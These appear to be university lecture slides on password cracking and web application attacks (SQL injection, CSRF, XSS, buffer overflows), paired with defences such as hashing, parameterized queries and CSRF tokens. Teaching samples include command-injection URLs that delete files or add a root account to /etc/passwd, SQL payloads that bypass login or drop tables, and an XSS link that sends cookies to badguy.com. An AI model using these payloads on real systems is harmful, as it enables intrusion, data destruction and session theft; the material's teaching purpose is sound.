1. password attack · the host does not need to know the passwords. the host just has to be able to...

Post on 14-Aug-2020


1. PASSWORD ATTACK

2. APPLICATION ATTACK

References:

1. Bruce Schneier, Applied Cryptography

2. CEH v7 Tutorial

21/03/2017


Authentication

Authentication using One-Way Functions

Authentication using Public-Key Cryptography

Attack


Authentication


When Alice logs into a host computer, how does the host know who she is?

How does the host know she is not Eve trying to falsify Alice’s identity?

Traditionally, passwords solve this problem.

Both Alice and the host know this secret piece of knowledge, and the host requests it from Alice every time she tries to log in.


Authentication using One-Way Functions


The host does not need to know the passwords.

The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way functions.

Instead of storing passwords, the host stores one-way functions of the passwords.


1. Alice sends the host her password.

2. The host performs a one-way function on the password.

3. The host compares the result of the one-way function to the value it previously stored.


Since the host no longer stores a table of everybody's valid password, the threat of someone breaking into the host and stealing the password list is mitigated.

The list of passwords operated on by the one-way function is useless, because the one-way function cannot be reversed to recover the passwords.
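The three-step check above, as an added example that is not part of the slides: the host keeps only the one-way function of each password and compares at login. It uses PBKDF2-HMAC-SHA256 as the one-way function and adds a per-user random salt, which goes beyond the slide's description (assumption) so that two users with the same password do not share a stored value.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 100_000   # work factor of the one-way function (assumed value)


def one_way(password: str, salt: bytes) -> bytes:
    """One-way function of the password: slow to compute, infeasible to invert."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def enroll(store: dict, user: str, password: str) -> None:
    """Host side at account creation: store salt and f(password), never the password."""
    salt = secrets.token_bytes(16)          # per-user salt, an addition to the slide's scheme
    store[user] = (salt, one_way(password, salt))


def login(store: dict, user: str, password: str) -> bool:
    """Steps 1-3 of the slide: Alice sends her password (step 1), the host applies the
    one-way function (step 2) and compares with the stored value (step 3)."""
    if user not in store:
        return False
    salt, stored = store[user]
    # constant-time comparison: a plain == would leak how many leading bytes matched
    return hmac.compare_digest(one_way(password, salt), stored)


if __name__ == "__main__":
    host_db = {}                            # the host's "password file"; holds no plaintext
    enroll(host_db, "alice", "correct horse battery staple")
    print(login(host_db, "alice", "correct horse battery staple"))   # True
    print(login(host_db, "alice", "wrong password"))                 # False
```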


Authentication using Public-Key Cryptography


Problem:

When Alice sends her password to her host, anyone who has access to her data path can read it.

Eve can be at any one of those points, listening to Alice's login sequence. If Eve has access to the processor memory of the host, she can see the password before the host hashes it.


Public-key cryptography can solve this problem.

The host keeps a file of every user's public key.

All users keep their own private keys.

When logging in, the protocol proceeds as follows:

• The host sends Alice a random string.

• Alice encrypts the string with her private key and sends it back to the host, along with her name.

• The host looks up Alice's public key in its database and decrypts the message using that public key.

• If the decrypted string matches what the host sent Alice in the first place, the host allows Alice access to the system.


Secure proof-of-identity protocols take the following form:

• Alice performs a computation based on some random numbers and her private key and sends the result to the host.

• The host sends Alice a different random number.

• Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host.

• The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key.

• If she does, her identity is verified.

If Alice does not trust the host any more than the host trusts Alice, then Alice will require the host to prove its identity in the same manner.

Step (1) might seem unnecessary and confusing, but it is required to prevent attacks against the protocol.
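One concrete protocol with exactly this shape is Schnorr identification, shown here as an added example (not from the slides or from Schneier's text): step 1 is the commitment t = g^r, step 2 the host's challenge c, step 3 Alice's response s = r + c·x, step 4 the host's check g^s = t·y^c. The group parameters are toy sized (assumption, chosen so the numbers are readable); the last function shows why step (1) is required: without a fresh r, the response s = c·x hands the private key to anyone who saw c and s.

```python
import secrets

# Toy parameters (constructed for readability, NOT for real use): a safe prime
# p = 2q + 1 and a generator of the order-q subgroup. Real deployments use a
# standard 2048-bit group or an elliptic curve.
P = 2039
Q = 1019
G = 4            # 4 = 2^2 is a quadratic residue mod P, so it has order exactly Q
assert G != 1 and pow(G, Q, P) == 1


def keygen():
    """Alice's private key x and public key y = g^x mod p; the host stores y."""
    x = secrets.randbelow(Q - 1) + 1
    return x, pow(G, x, P)


def step1_commit(r: int) -> int:
    """Step 1: Alice picks a fresh random r and sends the commitment t = g^r mod p."""
    return pow(G, r, P)


def step2_challenge() -> int:
    """Step 2: the host sends Alice a different random number c."""
    return secrets.randbelow(Q)


def step3_respond(x: int, r: int, c: int) -> int:
    """Step 3: Alice combines her own randomness, the host's challenge and her key."""
    return (r + c * x) % Q


def step4_verify(y: int, t: int, c: int, s: int) -> bool:
    """Step 4: g^s == t * y^c (mod p) holds iff s = r + c*x, i.e. iff Alice knows x."""
    return pow(G, s, P) == (t * pow(y, c, P)) % P


def run_protocol(x: int, y: int) -> bool:
    """Full honest run between Alice (holding x) and the host (holding y)."""
    r = secrets.randbelow(Q - 1) + 1
    t = step1_commit(r)
    c = step2_challenge()
    s = step3_respond(x, r, c)
    return step4_verify(y, t, c, s)


def key_leaked_without_step1(c: int, s: int) -> int:
    """If Alice skipped step 1 (r = 0), her response would be s = c*x mod q, and an
    eavesdropper recovers x = s * c^-1 mod q. This is the attack step (1) prevents."""
    return (s * pow(c, -1, Q)) % Q
```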


Password Cracking Techniques

(a) Dictionary attack: based on familiar passwords

(b) Brute force attack: tries every combination of characters

(c) Hybrid attack: like a dictionary attack, but adds some numbers and symbols

(d) Syllable attack: combination of brute force attack and dictionary attack

(e) Rule-based attack: used when the attacker gets some information about the password


Keylogger: a program that runs in the background and allows remote attackers to record every keystroke.

Trojan: enables attackers to get access to the passwords stored on the attacked computer.

Spyware: a type of malware that allows attackers to secretly gather information about a person or organization.


What does spyware do?

Steals the user's personal information and sends it to a remote server

Monitors the user's online activity

Displays annoying pop-ups and redirects the browser to advertising sites

Decreases the overall system security level

Connects to remote pornography sites

Reduces system performance and causes software instability


Purpose of a Trojan:

Steal information such as passwords, security codes and credit card information, using a keylogger

Delete or replace critical OS system files

Generate fake traffic to create a DoS attack

Disable firewall and antivirus

Use the victim's PC for spamming

Use the victim's PC as part of a botnet


A default password is a password supplied by the manufacturer with new equipment that is password protected.

Ex: www.defaultpassword.com


Windows stores user passwords in the Security Account Manager (SAM), not in clear text but hashed.


References:

1. Network Security. John Mitchell. Stanford University

2. CEH v7 Tutorial

Web security threat model: a Web Attacker sets up a malicious site visited by the victim (Alice); the attacker has no control of the network between Alice and the System.

Network security threat model: a Network Attacker intercepts and controls the network communication between Alice and the System.

SQL Injection: the browser sends malicious input to the server; bad input checking leads to a malicious SQL query (uses SQL to change the meaning of a database command).

CSRF (Cross-site request forgery): a bad web site sends a request to a good web site, using the credentials of an innocent victim who "visits" the bad site (leverages the user's session at the victim server).

XSS (Cross-site scripting): a bad web site sends an innocent victim a script that steals information from an honest web site (injects a malicious script into a trusted context).

Background for SQL Injection

Attack goal: execute arbitrary code on the server.

Example: code injection based on eval (PHP). http://site.com/calc.php (server-side calculator):

    $in = $_GET['exp'];
    eval('$ans = ' . $in . ';');

Attack (URL encoded): http://site.com/calc.php?exp=" 10 ; system('rm *.*') "

Example: PHP server-side code for sending email

    $email = $_POST["email"];
    $subject = $_POST["subject"];
    system("mail $email -s $subject < /tmp/joinmynetwork");

Attacker can post:

    http://yourdomain.com/mail.php?email=hacker@hackerhome.net&subject=foo < /usr/passwd; ls

or

    http://yourdomain.com/mail.php?email=hacker@hackerhome.net&subject=foo; echo "evil::0:0:root:/:/bin/sh">>/etc/passwd; ls

Sample PHP (the wrong way):

    $recipient = $_POST['recipient'];
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);

Problem: what if 'recipient' is a malicious string that changes the meaning of the query?


Diagram: (1) the attacker sends input that becomes an unintended SQL query at the victim server, (2) the server runs it against the victim SQL DB, (3) the attacker receives valuable data.


CardSystems: a credit card payment processing company; SQL injection attack in June 2005; put out of business.

The attack: 263,000 credit card numbers stolen from the database; credit card numbers stored unencrypted; 43 million credit card numbers exposed.

WordPress SEO plugin by Yoast, March 2015

"The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities. The authenticated Blind SQL Injection vulnerability can be found within the 'admin/class-bulk-editor-list-table.php' file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query."

https://wpvulndb.com/vulnerabilities/7841

    set ok = execute("SELECT * FROM Users WHERE user=' " & form("user") & " ' AND pwd=' " & form("pwd") & " '");
    if not ok.EOF
        login success
    else fail;

Is this exploitable?

Normal query (the browser client enters username and password; the web server sends the query to the DB):

    SELECT * FROM Users WHERE user='me' AND pwd='1234'

Suppose user = " ' or 1=1 -- " (URL encoded).

Then the script does: ok = execute( SELECT ... WHERE user= ' ' or 1=1 -- ... )

The "--" causes the rest of the line to be ignored.

Now ok.EOF is always false and the login succeeds.

The bad news: easy login to many sites this way.

Suppose user = " ' ; DROP TABLE Users -- "

Then the script does: ok = execute( SELECT ... WHERE user= ' ' ; DROP TABLE Users ... )

This deletes the Users table.

Similarly: the attacker can add users, reset passwords, etc.

Suppose user = " ' ; exec cmdshell 'net user badguy badpwd' / ADD -- "

Then the script does: ok = execute( SELECT ... WHERE username= ' ' ; exec ... )

If the SQL server context runs as "sa", the attacker gets an account on the DB server.

PHP: addslashes(" ' or 1=1 -- ") outputs " \' or 1=1 -- "

Unicode attack (GBK):

    0x5c    is  \
    0xbf27  is  ¿'
    0xbf5c  is  a single valid two-byte GBK character

    $user = 0xbf27
    addslashes($user) gives 0xbf5c27

The inserted backslash 0x5c combines with the preceding 0xbf into one GBK character, so the quote 0x27 is left unescaped.

Correct implementation: mysql_real_escape_string(), which builds SQL queries by properly escaping args (' becomes \') according to the connection's character set.

Never build SQL commands yourself!

Use parameterized/prepared SQL

Use an ORM framework

Example: Parameterized SQL (ASP.NET 1.1). Ensures SQL arguments are properly escaped.

    SqlCommand cmd = new SqlCommand(
        "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd",
        dbConnection);
    cmd.Parameters.Add("@User", Request["user"]);
    cmd.Parameters.Add("@Pwd", Request["pwd"]);
    cmd.ExecuteReader();

In PHP: bound parameters -- similar function.
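The login query from the slides in both forms, as an added example that is not part of the original deck: the string-built version (the wrong way) accepts the " ' or 1=1 -- " input shown earlier, while the parameterized version treats the same input as a literal username. The in-memory SQLite database and its single row are constructed test data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed Users table with one account (me / 1234), as in the 'normal query' slide."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    db.execute("INSERT INTO Users VALUES ('me', '1234')")
    return db


def login_unsafe(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """The wrong way, mirroring the ASP snippet: user input is pasted into the SQL
    text, so a quote in the input closes the literal and the remainder is parsed
    as SQL. With user = "' or 1=1 -- " the WHERE clause becomes always-true and
    the trailing comment swallows the pwd check."""
    sql = "SELECT * FROM Users WHERE user='" + user + "' AND pwd='" + pwd + "'"
    return db.execute(sql).fetchone() is not None      # "if not ok.EOF" on the slide


def login_safe(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Parameterized query: the statement shape is fixed before the values are
    bound, so input can only ever be compared as data, never parsed as SQL."""
    sql = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return db.execute(sql, (user, pwd)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 -- "
    print(login_unsafe(db, bypass, "anything"))   # True: login succeeds without a password
    print(login_safe(db, bypass, "anything"))     # False: no user literally named "' or 1=1 -- "
```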


Q: how long do you stay logged in to Gmail? Facebook? ….

Example:

User logs in to bank.com. The session cookie remains in browser state (user credentials: Cookie: SessionID=523FA4cd2E).

User visits another site containing:

    <form name=F action=http://bank.com/BillPay.php>
      <input name=recipient value=badguy> ...
    <script> document.F.submit(); </script>

The browser sends the user's auth cookie with the request, and the transaction will be fulfilled.

Problem: cookie auth is insufficient when side effects occur.


Fact: 50% of home users have a broadband router with a default or no password.

Drive-by Pharming attack: the user visits a malicious site; JavaScript at that site scans the home network looking for the broadband router:

• SOP allows "send only" messages

• Detect success using onerror: <IMG SRC=192.168.0.1 onError = do() >

Once the router is found, log in to it and change its DNS server.

Problem: "send-only" access is sufficient to reprogram the router.

[SRJ'07]

What if an honest site sends a POST to attacker.com? Solution: the Origin header records the redirect.

Login CSRF: strict Referer/Origin header validation. Login forms typically submit over HTTPS, where the Referer header is not blocked.

HTTPS sites, such as banking sites: use strict Referer/Origin validation to prevent CSRF.

Other sites: use Ruby-on-Rails or another framework that implements the secret token method correctly.

Origin header: an alternative to Referer with fewer privacy problems; sent only on POST, and sends only the necessary data; a defense against redirect-based attacks.
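Both defences named above applied to the bank.com/BillPay.php request from the earlier slide, as an added example (not from the slides): a secret token bound to the session, and strict Origin/Referer validation. The headers, form fields and server key are constructed; "csrf_token" is an assumed form field name, and the server key is a hypothetical secret held only by bank.com.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

SITE_ORIGIN = "http://bank.com"     # the only origin allowed to submit state-changing forms


def issue_token(server_key: bytes, session_id: str) -> str:
    """Secret token method: a value derived from the session that only a page
    served by bank.com within that session can embed in its form. A form hosted
    on a bad web site cannot know it, so the request in the example would lack it."""
    return hmac.new(server_key, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def origin_of(headers: dict):
    """Scheme and host of the submitting page. Prefer Origin (sent on POST, no path,
    fewer privacy problems) and fall back to Referer; None if neither is present."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return None
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}"


def request_allowed(server_key: bytes, session_id: str, headers: dict, form: dict) -> bool:
    """Strict validation for a request that has side effects: it must come from our
    own origin AND carry the session-bound token. The session cookie alone, which
    the browser attaches automatically, is never enough."""
    if origin_of(headers) != SITE_ORIGIN:
        return False                                  # cross-site or header missing
    expected = issue_token(server_key, session_id).encode("ascii")
    supplied = form.get("csrf_token", "").encode("utf-8")
    return hmac.compare_digest(supplied, expected)    # constant-time comparison


if __name__ == "__main__":
    key, sid = b"constructed-server-key", "523FA4cd2E"       # cookie value from the slide
    # the bad web site's auto-submitted form: cookie is present, token and origin are not ours
    forged = ({"Origin": "http://badsite.example", "Cookie": f"SessionID={sid}"},
              {"recipient": "badguy"})
    print(request_allowed(key, sid, *forged))                # False
```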


Search field on victim.com: http://victim.com/search.php?term=apple

Server-side implementation of search.php (echoes the search term into the response):

    <HTML> <TITLE> Search Results </TITLE>
    <BODY>
    Results for <?php echo $_GET['term'] ?> :
    . . .
    </BODY> </HTML>

Consider the link (properly URL encoded):

    http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>

What if the user clicks on this link?

1. The browser goes to victim.com/search.php

2. victim.com returns <HTML> Results for <script> ... </script>

3. The browser executes the script: it sends badguy.com the cookie for victim.com


An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.

Methods for injecting malicious code:

Reflected XSS ("type 1"): the attack script is reflected back to the user as part of a page from the victim site.

Stored XSS ("type 2"): the attacker stores the malicious code in a resource managed by the web application, such as a database.

Others, such as DOM-based attacks.


Email version

Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.

Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.

Victims were then redirected to a phishing site and prompted to enter sensitive financial data.

Source: http://www.acunetix.com/news/paypal.htm

SQL Injection: bad input checking allows a malicious SQL query. Known defenses address the problem effectively.

CSRF (Cross-site request forgery): forged request leveraging an ongoing session. Can be prevented (if XSS problems are fixed).

XSS (Cross-site scripting): problem stems from echoing untrusted input. Difficult to prevent; requires care, testing, tools, ...

Other server vulnerabilities: increasing knowledge embedded in frameworks, tools and application development recommendations.

References:

1. Professor Hossein Saiedian. KU Electrical Engineering and Computer Science.

“A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.”

A very common attack mechanism: from the 1988 Morris Worm to Code Red, Slammer, Sasser and many others.

Prevention techniques are known.

Still of major concern due to the legacy of widely deployed buggy code and continued careless programming techniques.

Caused by a programming error: allows more data to be stored than the capacity available in a fixed-sized buffer. The buffer can be on the stack, the heap, or in global data.

Overwriting adjacent memory locations leads to: corruption of program data, unexpected transfer of control, memory access violation, execution of code chosen by the attacker.

    #include <stdio.h>
    #include <string.h>

    #define FALSE 0
    #define TRUE  1

    /* next_tag() is not shown on the slide; this stand-in writes the tag "START",
       which is the value the sample runs below show in str1. */
    void next_tag(char *tag) { strcpy(tag, "START"); }

    int main(int argc, char *argv[]) {
        int valid = FALSE;
        char str1[8];
        char str2[8];
        next_tag(str1);
        gets(str2);   /* deliberately unsafe: gets() has no bound, so more than 7 input
                         characters overflow str2 into str1 and then into valid */
        if (strncmp(str1, str2, 8) == 0)
            valid = TRUE;
        printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid);
    }

    $ cc -g -o buffer1 buffer1.c
    $ ./buffer1
    START
    buffer1: str1(START), str2(START), valid(1)
    $ ./buffer1
    EVILINPUTVALUE
    buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0)
    $ ./buffer1
    BADINPUTBADINPUT
    buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)

    Memory     Before            After             Contains
    Address    gets(str2)        gets(str2)        Value of
    . . . .
    bffffbf4   34fcffbf 4...     34fcffbf 3...     argv
    bffffbf0   01000000 ....     01000000 ....     argc
    bffffbec   c6bd0340 ...@     c6bd0340 ...@     return addr
    bffffbe8   08fcffbf ....     08fcffbf ....     old base ptr
    bffffbe4   00000000 ....     01000000 ....     valid
    bffffbe0   80640140 .d.@     00640140 .d.@
    bffffbdc   54001540 T..@     4e505554 NPUT     str1[4-7]
    bffffbd8   53544152 STAR     42414449 BADI     str1[0-3]
    bffffbd4   00850408 ....     4e505554 NPUT     str2[4-7]
    bffffbd0   30561540 0V.@     42414449 BADI     str2[0-3]
    . . . .

To exploit a buffer overflow an attacker must identify a buffer overflow vulnerability in some program (inspection, tracing execution, fuzzing tools) and understand how the buffer is stored in memory to determine the potential for corruption.

At machine level all data is an array of bytes; its interpretation depends on the instructions used.

Modern high-level languages have a strong notion of type and of valid operations, and are not vulnerable to buffer overflows; this does incur overhead and some limits on use.

C and related languages have high-level control structures but allow direct access to memory, hence are vulnerable to buffer overflow, and have a large legacy of widely used, unsafe, and hence vulnerable code.

Stack frame:

Calling function: needs a data structure to store the "return" address and the parameters to be passed.

Called function: needs a place to store its local variables, somewhere different for every call.

Stack overflow: occurs when the buffer is located on the stack; used by the Morris Worm; the "Smashing the Stack" paper popularized it.

Local variables sit below the saved frame pointer and return address, hence overflow of a local buffer can potentially overwrite these key control items.

The attacker overwrites the return address with the address of the desired code: in the program, in a system library, or loaded into the buffer.

Buffer overflows are widely exploited

Large amount of vulnerable code in use

despite cause and countermeasures known

Two broad defense approaches

compile-time - harden new programs

run-time - handle attacks on existing programs

Use modern high-level languages with strong typing: not vulnerable to buffer overflow, since the compiler enforces range checks and permissible operations on variables. They do have a cost in resource use and restrictions on access to hardware, so some code in C-like languages is still needed.

If using potentially unsafe languages, e.g. C, the programmer must explicitly write safe code: by design with new code, and by extensive after-the-fact code review of existing code (e.g., OpenBSD).

Buffer overflow safety is a subset of general safe coding techniques: allow for graceful failure (know how things may go wrong) and check for sufficient space in any buffer.

Proposals for safety extensions (library replacements) to C

performance penalties

must compile programs with special compiler

Several safer standard library variants

new functions, e.g. strlcpy()

safer re-implementation of standard functions as a dynamic library, e.g. Libsafe

Stackguard: add function entry and exit code to check the stack for signs of corruption, using a random canary (e.g. Stackguard, Win/GS, GCC). Check for an overwrite between the local variables and the saved frame pointer and return address; abort the program if a change is found. Issues: recompilation, debugger support.

Or save and check a safe copy of the return address (in a safe, non-corruptible memory area), e.g. Stackshield, RAD.

Many BO attacks copy machine code into buffer and xfer ctrl to it

Use virtual memory support to make some regions of memory non-executable (to avoid exec of attacker’s code) e.g. stack, heap, global data

need h/w support in MMU

long existed on SPARC/Solaris systems

recent on x86 Linux/Unix/Windows systems

Issues: support for executable stack code

Manipulate location of key data structures

stack, heap, global data: change address by 1 MB

using random shift for each process

have large address range on modern systems means wasting some has negligible impact

Randomize location of heap buffers and location of standard library functions

Place guard pages between critical regions of memory (or between stack frames)

flagged in MMU (mem mgmt unit) as illegal addresses

any access aborts process

Can even place between stack frames and heap buffers

at execution time and space cost
